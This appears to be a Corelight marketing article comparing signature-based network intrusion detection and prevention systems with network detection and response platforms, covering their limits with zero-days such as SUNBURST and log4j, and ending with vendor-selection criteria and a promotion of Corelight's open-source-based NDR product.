NDR vs. IDS: Which is best for threat detection?

Discover why SecOps teams are turning to NDR to detect and disrupt sophisticated emerging threats.

The role that IDS has played in security

Network Intrusion detection systems and network intrusion prevention systems (NIDS/NIPS) have been foundational components of cyber security since the mid-1990s. Network IDS are deployed primarily at the ingress/egress points of internet traffic and sometimes at key switching locations on the network to monitor internal lateral movement traffic.

An IDS typically relies on signature-based detections to identify threats and adversarial activity on the network. Over time, IDS systems added prevention capability and became intrusion prevention systems, or IPS. The IPS functionality blocks network traffic in addition to monitoring it. So whenever a detection alert is triggered, the network traffic is halted. Prevention capabilities were a result of analysts and incident responders becoming overwhelmed due to increases in both the number of attacks and their level of sophistication. However, due to the level of expertise needed to properly tune IPS signatures, SecOps teams quickly felt the ire from the NetOps side of the house due to frequent inadvertent network outages due to false-positives and benign true-positives triggering inline blocking of network traffic.

IDS platforms generally now include anomalous behavior detection capabilities and even machine learning (ML) to look for irregular traffic patterns and known indicators and precursors of an attack profile. IDS solutions can also include specific malware detection techniques, including virtual sandboxing to run and test executable software in isolation before it is passed on. Because of all these different types of detections and capabilities, both IDS and IPS solutions are now an important part of compliance with standards and regulations, such as Payment Card Industry Data Security Standard (PCI DSS), which may explicitly require the use of IDS or IPS to ensure protection of sensitive third-party information.

The challenge of leveraging IDS capabilities in isolation

It is very important to understand what happens when an IDS detection triggers and how it impacts an organization. When a detection is triggered, the IDS generates event logs and alerts for a SIEM to aggregate, correlate, and forward to SecOps teams. Correlation with events and alerts from other security solutions like EDR is critical because it transforms raw alerts and events into a context-rich story that accelerates a SOC’s ability to investigate, detect, and respond to threats. But before correlation can happen, the IDS events and alerts must first be normalized by the SIEM. Without correlation, these alerts and events would only include a subset amount of related threat details, therefore requiring more senior-level analysts and incident responders to spend additional time searching for the other pieces of the story and then trying to weave them all together.

Even if a security team has correlated their IDS alerts with rich context, the IDS is signature-based, which means the team only can see when a known vulnerability has been detected, thus firing an alert. This also means that an IDS cannot produce evidence of a zero-day attack because zero-days happen in real time and are not accounted for with an industry-wide detection or signature until it’s too late. For example, when SUNBURST and log4j were first discovered in 2020 and 2021 respectively, they were considered to be zero-day attacks as they were not previously known to the industry, making it impossible for them to be detected by traditional IDS.

Without a known detection or signature for the IDS to pull from, an alert is not triggered. It wasn’t until an industry-wide detection was issued for SUNBURST and log4j that companies could even leverage their IDS to determine whether an attacker had used these vulnerabilities to compromise their systems. This is because an IDS only leverages known signatures, and does not provide security teams with general network monitoring and data. Without this type of information, security teams do not have the historical telemetry they need to conduct in-depth investigations, meaning that their organization is vulnerable to attackers because they have no way to see if someone is leveraging an in-progress vulnerability like SUNBURST or log4j to enter the network. (For more on the advantages of tools that facilitate retro-matching to see if you’ve been compromised through an unaddressed vulnerability, keep reading as we will discuss tools like NDR below).

Speaking of alerts, not all alerts and events are true-positive; without significant tuning of IDS platforms, specifically the detection rules, most alerts turn out to be false-positives. And even if they are true-positive, they are not always tagged with the appropriate severity because the IDS bases the severity on its own detection rule. However, when correlated with alerts and logs from other security solutions, the accuracy of the severity measurement can improve dramatically. Without correlation, symptoms of alert fatigue appear very quickly (e.g., lengthy incident handling and remediation times).

As many security professionals have pointed out, the playbook that adversaries use is designed to evade traditional IDS/IPS detections and capabilities. Their playbook in its basic form simply requires human error to gain access to a trusted, privileged account, and then uses that compromised account to blend in with everyday network traffic. This is possible because they already know exactly what will trigger an IDS alert because they can research the detections and rules well ahead of time. IDS alerts are typically written reactively, based on the research of attacks that have already happened. Vendors have to write detection rules in a one-size-fits-all style because that rule has to apply to the most common network configurations. While IDS/IPS capabilities are still essential, many organizations are shifting to more sophisticated, customizable, and comprehensive solutions.

There are practical concerns beyond the technology’s technical limitations. Many IDS systems are nearing end-of-life and are no longer adequately supported by their vendors. The upgrade paths that IDS/IPS vendors offer to customers affected by EOL models are just hardware improvements and extended warranties; they do not offer any cutting-edge detection capabilities.

What is NDR?

Network Detection and Response (NDR) is a security technology that, like network IDS, monitors network traffic, but it can scan a much more complex environment, including but not limited to cloud, hybrid, and multi-cloud environments, network firewalls, SaaS, traffic generated by remote users, network taps, and servers. It enables security teams to monitor lateral movement, making it much more likely to detect activity by malicious actors who have bypassed traditional perimeter defenses by compromising remote user accounts or devices.

For many enterprises, migrating to an NDR platform has allowed them to retain the core IDS monitoring and detection functionality with continued compliance and reporting capabilities, while significantly improving their alerting and threat detection and response capabilities. The paragraphs below explain how an upgrade to NDR can be a “both/and” proposition that preserves necessary IDS functions while significantly improving overall security.

An NDR platform will aggregate the data from disparate sources and provide structure and context for analysts, which in turn helps them become more efficient when validating and triaging alerts and tuning the alert system. It provides the double benefit of providing wider and deeper coverage of enterprise environments, streamlining response, and making network-based attack techniques, such as command and control (C2) or data exfiltration, easier for security teams to spot in early attack phases.

NDR also provides SOCs with the historical telemetry and context to see whether an adversary has entered their network and, if so, how they entered. This type of historical look-back is something that signature-based tools lack. NDR provides network data that can extend the threat intelligence timeline backward, and provides threat analysts with the ability to scan for known indicators and evidence of vulnerability exploitation that pre-date the discovery of zero-days. But not all NDR is the same. Even NDR can have limitations, often only looking back a few days, which limits an analyst’s investigation timeline. However, NDR technologies that incorporate network security monitoring platforms such as Zeek®, extend an investigation timeline significantly, going back months and even years. By using network security monitoring, analysts can uncover evidence of adversary activity and disrupt potential attacks before they happen.

Can NDR replace IDS?

Organizations looking to replace an aging IDS/IPS solution will need assurance that none of its critical functionality will be lost when migrating to another solution. A best-in-class NDR platform, with strong support from its vendor, should result in a seamless migration that delivers equal or improved IDS functionality.

Best-in-class NDR solutions will pre-correlate core IDS monitoring and detection capabilities with unbiased network metadata and just-in-time trigger-based packet capture technology to generate contextually rich network evidence that accelerates incident investigation and response times and improves effectiveness across all SecOps teams.

When NDR is deployed in conjunction with other security solutions, such as endpoint detection and response (EDR), security information and event management (SIEM), and, in some cases, extended detection and response (XDR), security analysts can achieve a comprehensive detection and response capability that can deepen over time and provide a strong combination of automation, analytics, and signature collections for a more holistic approach to security.

Choosing the right NDR solution

When looking to evolve your IDS capabilities, consider these decisive factors for selecting an NDR solution:

1. Best-in-Class Network Visibility: Seek out vendors that provide transparent and detailed insights into the data sources and visibility provided. Avoid platforms that feel like a "black box" or utilize unexplained ML. If a vendor can't clarify data origins, your security team will face the same ambiguity during investigation. It's essential for your team to visualize the entire network activity narrative, not just threat indicators alerts.
2. Seamless Interoperability and Integration: Consolidating security tools can be challenging, especially when working with various vendor products. An ideal NDR solution should not only provide expansive visibility but also seamlessly integrate with existing security infrastructure like EDR and SIEM. This integration is paramount for an efficient SOC Visibility Triad. It's crucial to ascertain the vendor's stance on integration and their flexibility early on. Some might push their proprietary platforms, which could be counterproductive if you're content with your current systems.
3. Robust Evidence to Complement IDS Alerts: While NDRs provide a more extensive network data collection than traditional IDS, it's the quality and context of the data that matter most. Prioritize solutions with effective entity discovery and data collection tools, backed by features that enable security teams to optimize logging to avoid data overwhelm. A prime NDR solution will correlate IDS alerts with enriched network logs and intelligent packet captures, enabling teams to swiftly act on genuine threats.

Corelight's commitment to excellence with open source

Corelight is the leader in Open NDR, an approach to NDR that leverages open source technologies including Zeek and Suricata for delivering world-class network visibility accompanied by precise alerts, comprehensive network metadata, and space-efficient PCAPs. The global cyber community widely adopts these tools, setting an industry standard that's not just applied in practice but is also taught at revered institutions like SANS.

By harnessing community-driven and native analytics, Corelight delivers cutting-edge intelligence and threat hunting capabilities across every facet of your organization’s kill chain. Celebrated by Forrester in its Network Analysis and Visibility 2023 report for our structured data and seamless SIEM integrations, Corelight ensures that security teams can expedite investigations, markedly reducing the time to detect and counteract threats. Learn about Corelight Open NDR.